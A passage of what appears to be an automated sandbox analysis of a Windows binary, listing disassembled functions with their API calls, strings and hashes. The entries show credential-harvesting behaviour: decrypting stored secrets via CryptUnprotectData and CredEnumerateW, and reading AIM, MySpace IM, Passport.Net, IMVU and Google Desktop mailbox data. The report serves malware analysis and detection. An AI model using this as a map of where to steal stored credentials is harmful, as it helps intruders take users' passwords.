                                                                                                    • Opcode ID: eaa32ef34ef00f9ac7c7a4cfa2a550b3bebd30948c3fa105c0e2286ae863700b
                                                                                                    • Instruction ID: 2fc49bb05c8bae64ff8dc8c223d61166255d3b04a08aec8dce2eb6f2e2500c43
                                                                                                    • Opcode Fuzzy Hash: eaa32ef34ef00f9ac7c7a4cfa2a550b3bebd30948c3fa105c0e2286ae863700b
                                                                                                    • Instruction Fuzzy Hash: BCF0E0725451587AEB139B54EC05FCA7BBC9B4C706F1040E6B749F6080D5F89AC087AC
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00406830, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLastMessagesprintf
                                                                                                    • String ID: Error$Error %d: %s
                                                                                                    • API String ID: 1670431679-1552265934
                                                                                                    • Opcode ID: 36d162438dc91d31452d3ddaed1ce93054fc777c1344ba0c13efd454db99335c
                                                                                                    • Instruction ID: 390cea375f2136b4ea19b9d86a6fd2b83de258ebf73c3752b6ef921ad7f75954
                                                                                                    • Opcode Fuzzy Hash: 36d162438dc91d31452d3ddaed1ce93054fc777c1344ba0c13efd454db99335c
                                                                                                    • Instruction Fuzzy Hash: 5CF0ECB780020877CB11A754CC05FD676BCBB84704F1540BAB905F2140FF74DA458FA8
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004108FA, Relevance: 7.6, APIs: 6, Instructions: 141COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00404C9D: LoadLibraryA.KERNELBASE(crypt32.dll,00000000,00404771,?,?), ref: 00404CAA
                                                                                                      • Part of subcall function 00404C9D: GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00404CBC
                                                                                                    • memset.MSVCRT ref: 00410939
                                                                                                    • memset.MSVCRT ref: 0041097A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: memset$AddressLibraryLoadProc
                                                                                                    • String ID:
                                                                                                    • API String ID: 95357979-0
                                                                                                    • Opcode ID: 3302643975eb3434f4358ab3f025d73aba831524dacbebe51815e8c7a7d14f38
                                                                                                    • Instruction ID: c4421e9d11457ef95cabe1857e087483fdaed0180908bfd30e84e21e9d597d19
                                                                                                    • Opcode Fuzzy Hash: 3302643975eb3434f4358ab3f025d73aba831524dacbebe51815e8c7a7d14f38
                                                                                                    • Instruction Fuzzy Hash: 6F5139B1C1021DAADF10DF95CD819EEB7BCBF18348F4001AAE605B2251E7789B84CB64
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040C929, Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 67COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: memcpy
                                                                                                    • String ID: @$@
                                                                                                    • API String ID: 3510742995-149943524
                                                                                                    • Opcode ID: 77fc6db62da11d4799c937781f1bf202b3f83c4704148cc1087516cdf216477c
                                                                                                    • Instruction ID: 666a53640e029d8b41511af47e133ff9607f2a84e66000161f6e85dafd6cdb1f
                                                                                                    • Opcode Fuzzy Hash: 77fc6db62da11d4799c937781f1bf202b3f83c4704148cc1087516cdf216477c
                                                                                                    • Instruction Fuzzy Hash: 7C115BF2A00709ABCB248F25ECC0DAA77A8EB50344B00033FFD0696291E634DE49C6D9
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00410B95, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 62stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: memsetstrlen$_mbscat_mbscpy
                                                                                                    • String ID: MySpace\IM\users.txt
                                                                                                    • API String ID: 779718277-1720829597
                                                                                                    • Opcode ID: f8ed8349e31379889d292e31ea272a5c02fd75e66e7d4909b24daaaee6762c02
                                                                                                    • Instruction ID: 202a42f0f95dfe566303623c375a0ffeb092d6a880f5aac0c7a4f490a513d9c5
                                                                                                    • Opcode Fuzzy Hash: f8ed8349e31379889d292e31ea272a5c02fd75e66e7d4909b24daaaee6762c02
                                                                                                    • Instruction Fuzzy Hash: 3511CA7390411C6AD710EA51EC85EDB777C9F61305F1404FBE549E2042EEB89FC88BA5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040A455, Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 004067EC: strlen.MSVCRT ref: 004067F9
                                                                                                      • Part of subcall function 004067EC: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A46C,?,<item>), ref: 00406806
                                                                                                    • memset.MSVCRT ref: 0040A48B
                                                                                                      • Part of subcall function 0041244B: memcpy.MSVCRT ref: 004124B9
                                                                                                      • Part of subcall function 00409DD6: _mbscpy.MSVCRT ref: 00409DDB
                                                                                                      • Part of subcall function 00409DD6: _strlwr.MSVCRT ref: 00409E1E
                                                                                                    • sprintf.MSVCRT ref: 0040A4D0
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: FileWrite_mbscpy_strlwrmemcpymemsetsprintfstrlen
                                                                                                    • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                    • API String ID: 3337535707-2769808009
                                                                                                    • Opcode ID: 3c2db06bff03dcf5fd4fdc9aafb8c3b6a106532d81ea05e082948edd07be60db
                                                                                                    • Instruction ID: 35c3a08c9f4b1e8506f5bd30b0a1229d9af700aff423b6f7980a7f41b92f6d4d
                                                                                                    • Opcode Fuzzy Hash: 3c2db06bff03dcf5fd4fdc9aafb8c3b6a106532d81ea05e082948edd07be60db
                                                                                                    • Instruction Fuzzy Hash: E811E731500616BFD711AF15CC42E9ABB68FF0831CF10402AF409665A1EB76B974CB88
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040B1EC, Relevance: 7.6, APIs: 5, Instructions: 57windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 0040B233
                                                                                                      • Part of subcall function 0040671B: LoadCursorA.USER32(00000000,00007F02), ref: 00406722
                                                                                                      • Part of subcall function 0040671B: SetCursor.USER32(00000000), ref: 00406729
                                                                                                    • SendMessageA.USER32(?,00001009,00000000,00000000), ref: 0040B256
                                                                                                      • Part of subcall function 004028E7: GetModuleHandleA.KERNEL32(00000000), ref: 00402902
                                                                                                      • Part of subcall function 004028E7: GetProcAddress.KERNEL32(00000000,00000000), ref: 00402924
                                                                                                      • Part of subcall function 004028E7: FreeLibrary.KERNEL32(00000000), ref: 00402934
                                                                                                    • SetCursor.USER32(?,?,0040C35B), ref: 0040B286
                                                                                                    • SetFocus.USER32(?,?,?,0040C35B), ref: 0040B298
                                                                                                    • SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 0040B2AF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: CursorMessageSend$AddressFocusFreeHandleLibraryLoadModuleProc
                                                                                                    • String ID:
                                                                                                    • API String ID: 1022157474-0
                                                                                                    • Opcode ID: b84fe70da1aaf1055744e1b632632b9f496727907b48f7315893cd4c83107089
                                                                                                    • Instruction ID: acf4f1a7ad8cb56491b263665e164ee1eacf8da490df75951db8ca09a257b5c1
                                                                                                    • Opcode Fuzzy Hash: b84fe70da1aaf1055744e1b632632b9f496727907b48f7315893cd4c83107089
                                                                                                    • Instruction Fuzzy Hash: 5C111235200204AFDB16AF55CC85FD537ADFF49708F0A40B9FD099F2A2CBB569108B68
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00408A69, Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetParent.USER32(?), ref: 00408A7B
                                                                                                    • GetWindowRect.USER32(?,?), ref: 00408A88
                                                                                                    • GetClientRect.USER32(00000000,?), ref: 00408A93
                                                                                                    • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 00408AA3
                                                                                                    • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00408ABF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: Window$Rect$ClientParentPoints
                                                                                                    • String ID:
                                                                                                    • API String ID: 4247780290-0
                                                                                                    • Opcode ID: 3aa8e274ce559d31e536c38d989a921174712bd1f9a65828c633d0b3e27811af
                                                                                                    • Instruction ID: 47fd7c03741454bdc7a166d99d5f54bcb442ad9a41c6e05a353417ffaf8a91e2
                                                                                                    • Opcode Fuzzy Hash: 3aa8e274ce559d31e536c38d989a921174712bd1f9a65828c633d0b3e27811af
                                                                                                    • Instruction Fuzzy Hash: 0F014832901129BBDB11DBA5DC49EFFBFBCEF86750F04802AFD11A2140D77895018BA5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040A627, Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 44COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040A64A
                                                                                                    • memset.MSVCRT ref: 0040A660
                                                                                                      • Part of subcall function 004067EC: strlen.MSVCRT ref: 004067F9
                                                                                                      • Part of subcall function 004067EC: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A46C,?,<item>), ref: 00406806
                                                                                                      • Part of subcall function 00409DD6: _mbscpy.MSVCRT ref: 00409DDB
                                                                                                      • Part of subcall function 00409DD6: _strlwr.MSVCRT ref: 00409E1E
                                                                                                    • sprintf.MSVCRT ref: 0040A697
                                                                                                    Strings
                                                                                                    • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 0040A665
                                                                                                    • <%s>, xrefs: 0040A691
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
                                                                                                    • String ID: <%s>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                    • API String ID: 3699762281-1998499579
                                                                                                    • Opcode ID: ab5707da10e36317461923ea0a964ffd6f4046b5a0df19b15fd79c1ac8c7a337
                                                                                                    • Instruction ID: 800cbe4d2eb2546f00b8b879064eadffaf4e9ad3efc3a30f3f6e1286e630d524
                                                                                                    • Opcode Fuzzy Hash: ab5707da10e36317461923ea0a964ffd6f4046b5a0df19b15fd79c1ac8c7a337
                                                                                                    • Instruction Fuzzy Hash: 92012B7294021977DB21A715CC46FDA7B6CAF14709F0400BBB50DF3082DB789B848BA4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00409370, Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: ??3@
                                                                                                    • String ID:
                                                                                                    • API String ID: 613200358-0
                                                                                                    • Opcode ID: f3ce8d52872a8f30b96e2fbf292860e550b06a588b426c696271bbab4e9a7e1e
                                                                                                    • Instruction ID: fe66dba444066183ee9975a3477c76674c14659d363ac613d024ab661048b2ad
                                                                                                    • Opcode Fuzzy Hash: f3ce8d52872a8f30b96e2fbf292860e550b06a588b426c696271bbab4e9a7e1e
                                                                                                    • Instruction Fuzzy Hash: 25F0FF726097015BD7209FAAB5C059BB7E9BB49725B60193FF54DD3682C738BC808A1C
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004093D6, Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00409370: ??3@YAXPAX@Z.MSVCRT ref: 0040937C
                                                                                                      • Part of subcall function 00409370: ??3@YAXPAX@Z.MSVCRT ref: 0040938A
                                                                                                      • Part of subcall function 00409370: ??3@YAXPAX@Z.MSVCRT ref: 0040939B
                                                                                                      • Part of subcall function 00409370: ??3@YAXPAX@Z.MSVCRT ref: 004093B2
                                                                                                      • Part of subcall function 00409370: ??3@YAXPAX@Z.MSVCRT ref: 004093BB
                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 004093F1
                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 00409404
                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 00409417
                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040942A
                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040943E
                                                                                                      • Part of subcall function 00407491: ??3@YAXPAX@Z.MSVCRT ref: 00407498
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: ??3@
                                                                                                    • String ID:
                                                                                                    • API String ID: 613200358-0
                                                                                                    • Opcode ID: 861f2bd0b500dde649bfe3e660fba7f3132bafa3592ddb285ba67a8820c9dd2a
                                                                                                    • Instruction ID: 09cfe481c9f5149ef6062cf2713671c90beccbfb684cd0f5c8863379cec44e3f
                                                                                                    • Opcode Fuzzy Hash: 861f2bd0b500dde649bfe3e660fba7f3132bafa3592ddb285ba67a8820c9dd2a
                                                                                                    • Instruction Fuzzy Hash: 67F06232D0E53167C9257F26B00158EA7646E46725315426FF8097B3D3CF3C6D8146EE
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00411B27, Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00406B6F: memset.MSVCRT ref: 00406B8F
                                                                                                      • Part of subcall function 00406B6F: GetClassNameA.USER32(?,00000000,000000FF), ref: 00406BA2
                                                                                                      • Part of subcall function 00406B6F: _strcmpi.MSVCRT ref: 00406BB4
                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 00411B4E
                                                                                                    • GetSysColor.USER32(00000005), ref: 00411B56
                                                                                                    • SetBkColor.GDI32(?,00000000), ref: 00411B60
                                                                                                    • SetTextColor.GDI32(?,00C00000), ref: 00411B6E
                                                                                                    • GetSysColorBrush.USER32(00000005), ref: 00411B76
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: Color$BrushClassModeNameText_strcmpimemset
                                                                                                    • String ID:
                                                                                                    • API String ID: 2775283111-0
                                                                                                    • Opcode ID: 4c6c90dc6369ed9def7ad49a685608b6b97007b198ef546a8f3c4911ca2b9476
                                                                                                    • Instruction ID: b9af807899647846139a12986955ac2cc84645abd360b6802fc8b760439410eb
                                                                                                    • Opcode Fuzzy Hash: 4c6c90dc6369ed9def7ad49a685608b6b97007b198ef546a8f3c4911ca2b9476
                                                                                                    • Instruction Fuzzy Hash: 92F03136104504FBDF112FA5EC09FDE3F25EF44721F10812AFA19951B1DB75A9A09B58
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040FF88, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00404109: LoadLibraryA.KERNEL32(advapi32.dll,00000000,0040FFAB,7661E520,?,?,?,?,?,?,?,?,?,?,?,0040DB18), ref: 00404116
                                                                                                      • Part of subcall function 00404109: GetProcAddress.KERNEL32(00000000,CredReadW), ref: 0040412F
                                                                                                      • Part of subcall function 00404109: GetProcAddress.KERNEL32(?,CredFree), ref: 0040413B
                                                                                                      • Part of subcall function 00404109: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404147
                                                                                                      • Part of subcall function 00404C9D: LoadLibraryA.KERNELBASE(crypt32.dll,00000000,00404771,?,?), ref: 00404CAA
                                                                                                      • Part of subcall function 00404C9D: GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00404CBC
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,00000000,?,?,?), ref: 0041005B
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,00000000,?,?,?), ref: 00410071
                                                                                                    • LocalFree.KERNEL32(?,?,00000000,?,?,?), ref: 0041007D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$ByteCharLibraryLoadMultiWide$FreeLocal
                                                                                                    • String ID: Passport.Net\*
                                                                                                    • API String ID: 4171712514-3671122194
                                                                                                    • Opcode ID: 4033d74ea8b7e7d1449d062c3a122578251190037a8d9eb515b0a5cc15d38eb4
                                                                                                    • Instruction ID: a8053254f1e515f4d897164d33fe2023de59da6d422685d1f9c73d0263123044
                                                                                                    • Opcode Fuzzy Hash: 4033d74ea8b7e7d1449d062c3a122578251190037a8d9eb515b0a5cc15d38eb4
                                                                                                    • Instruction Fuzzy Hash: 9231F7B1D01129AADB10DF95DC44EDEBBB8FF49750F11406BF610A7250D7789A81CBA8
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00410AC5, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 004067BA: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00404233,?), ref: 004067CC
                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,MySpace\IM\users.txt,00000104,00000000,?,?,?,?,00410C45,?,00000000), ref: 00410AE7
                                                                                                      • Part of subcall function 00407A56: ??3@YAXPAX@Z.MSVCRT ref: 00407A5D
                                                                                                      • Part of subcall function 00407A56: ??2@YAPAXI@Z.MSVCRT ref: 00407A6B
                                                                                                      • Part of subcall function 00406ED6: ReadFile.KERNELBASE(?,?,?,00000000,00000000,00000001,?,00404269,00000000,00000000,00000000), ref: 00406EED
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,?,00000000,00000000,?,?,?,?,?,?,?,00410C45), ref: 00410B64
                                                                                                      • Part of subcall function 004108FA: memset.MSVCRT ref: 00410939
                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,00410C45,?,00000000), ref: 00410B78
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: File$??2@??3@ByteCharCloseCreateHandleMultiReadSizeWidememset
                                                                                                    • String ID: MySpace\IM\users.txt
                                                                                                    • API String ID: 429556018-1720829597
                                                                                                    • Opcode ID: 9ecfc60a0865bdac6d3c577decf5946b40f4711ca6fbc71636231e6ee1035587
                                                                                                    • Instruction ID: 28eca0bbeff0950369e7ada1521615d79b3b69832f60dc8e7f5924118cda3e2e
                                                                                                    • Opcode Fuzzy Hash: 9ecfc60a0865bdac6d3c577decf5946b40f4711ca6fbc71636231e6ee1035587
                                                                                                    • Instruction Fuzzy Hash: 21217171C0424AEFCF00DFA9CC458DEBB74EF41328B158166E924772A1C634AA45CBA5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00402834, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00411D68: RegOpenKeyExA.KERNELBASE(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B
                                                                                                    • memset.MSVCRT ref: 00402873
                                                                                                      • Part of subcall function 00411DEE: RegEnumKeyExA.ADVAPI32(?,000000FF,000000FF,?,00000000,00000000,00000000,000000FF,000000FF), ref: 00411E11
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 004028C2
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 004028DF
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: Close$EnumOpenmemset
                                                                                                    • String ID: Software\AIM\AIMPRO
                                                                                                    • API String ID: 2255314230-3527110354
                                                                                                    • Opcode ID: dded90e1ec05a9ac15428789d49d31d8fd58391a594f54d73697f6d07bfadf32
                                                                                                    • Instruction ID: 67585355273d4b01a1114a6cd89f6c97ebf6c1cbf8b7b4d496df69d3c229a794
                                                                                                    • Opcode Fuzzy Hash: dded90e1ec05a9ac15428789d49d31d8fd58391a594f54d73697f6d07bfadf32
                                                                                                    • Instruction Fuzzy Hash: 48115E76904118BADF21A792ED06FDE7B7CDF54304F0000B6AA44E1091EB756FD5DA64
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00407BC6, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00411D68: RegOpenKeyExA.KERNELBASE(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B
                                                                                                    • memset.MSVCRT ref: 00407C05
                                                                                                      • Part of subcall function 00411DEE: RegEnumKeyExA.ADVAPI32(?,000000FF,000000FF,?,00000000,00000000,00000000,000000FF,000000FF), ref: 00411E11
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00407C54
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00407C71
                                                                                                    Strings
                                                                                                    • Software\Google\Google Desktop\Mailboxes, xrefs: 00407BD5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: Close$EnumOpenmemset
                                                                                                    • String ID: Software\Google\Google Desktop\Mailboxes
                                                                                                    • API String ID: 2255314230-2212045309
                                                                                                    • Opcode ID: b50ec71faf233748746677e360152f00ca846f408f6190e6d0fa9129bc25d888
                                                                                                    • Instruction ID: a9c93927ac610b6ef28ec82afd47bdb8c9c4627465144405bf34b6a811739c17
                                                                                                    • Opcode Fuzzy Hash: b50ec71faf233748746677e360152f00ca846f408f6190e6d0fa9129bc25d888
                                                                                                    • Instruction Fuzzy Hash: E9115EB6D04118BADF21AB91EC41FDEBB7CDF55304F0041B6BA04E1051E7756B94CEA9
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00403BF0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: _mbscmp_mbsicmpmemset
                                                                                                    • String ID: :@
                                                                                                    • API String ID: 1080945674-3074689909
                                                                                                    • Opcode ID: fc6b87c77e97942f29d542673130d1b31dda64e9daeb6a0660619c666916343b
                                                                                                    • Instruction ID: 05d51c46cf4b3144aa59074ae4edee5e5c3f47845a6acae635e5c8c721b5e64e
                                                                                                    • Opcode Fuzzy Hash: fc6b87c77e97942f29d542673130d1b31dda64e9daeb6a0660619c666916343b
                                                                                                    • Instruction Fuzzy Hash: 9911867250C3459AD720EEA5E809BDB77DCEB84315F004D3FF594E3181E7749609879A
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0041051F, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • _wcsnicmp.MSVCRT ref: 0041053E
                                                                                                      • Part of subcall function 0040FD01: memset.MSVCRT ref: 0040FD18
                                                                                                      • Part of subcall function 0040FD01: memset.MSVCRT ref: 0040FD21
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000), ref: 00410570
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000), ref: 00410587
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWidememset$_wcsnicmp
                                                                                                    • String ID: windowslive:name=
                                                                                                    • API String ID: 947294041-3311407311
                                                                                                    • Opcode ID: fd4d89018f6d8f297b5807dfdb0caed421d73eceed85ab27545bd491571ae371
                                                                                                    • Instruction ID: aaacd06d763df2f40df435721f5dd751edfa9d120b015f6101ff871e9026a9e8
                                                                                                    • Opcode Fuzzy Hash: fd4d89018f6d8f297b5807dfdb0caed421d73eceed85ab27545bd491571ae371
                                                                                                    • Instruction Fuzzy Hash: A80184B6604209BFD710DF59DC84DD77BECEB49364F10462ABA28D72A1D630DD04CBA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040F2E1, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000), ref: 0040F325
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000), ref: 0040F339
                                                                                                    • _wcsnicmp.MSVCRT ref: 0040F347
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide$_wcsnicmp
                                                                                                    • String ID: http://www.imvu.com
                                                                                                    • API String ID: 1082246498-3717390816
                                                                                                    • Opcode ID: d858862f83375720269192bc115d82f05b3495ae824a477da88cd8a016989edf
                                                                                                    • Instruction ID: a621eff572e40bce3e368aabcc4a0ad2a08d37bae4b59898fbad6a548f86f146
                                                                                                    • Opcode Fuzzy Hash: d858862f83375720269192bc115d82f05b3495ae824a477da88cd8a016989edf
                                                                                                    • Instruction Fuzzy Hash: CD1152B2544349AED7309E599C84EEB7FACEB89364F10062EB96892191D7305A14C6B2
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00410894, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memcpy.MSVCRT ref: 004108AE
                                                                                                    • memcpy.MSVCRT ref: 004108C0
                                                                                                    • DialogBoxParamA.USER32(0000006B,?,Function_000105A6,00000000), ref: 004108E4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: memcpy$DialogParam
                                                                                                    • String ID: ;4
                                                                                                    • API String ID: 392721444-4181167889
                                                                                                    • Opcode ID: c5f1268ccc674415783c8697f9a32e79e000757815ba7d6e947a1f9e053f7934
                                                                                                    • Instruction ID: 2aaa1d25541d53f243854b8b99eb4e9492d8e88977a0f1258d463d5600498ee3
                                                                                                    • Opcode Fuzzy Hash: c5f1268ccc674415783c8697f9a32e79e000757815ba7d6e947a1f9e053f7934
                                                                                                    • Instruction Fuzzy Hash: 86F0A771A44730BBF7216F55BC06BC67A91AB08B06F218036F545A51D0C3B925D08FDC
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00406B6F, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
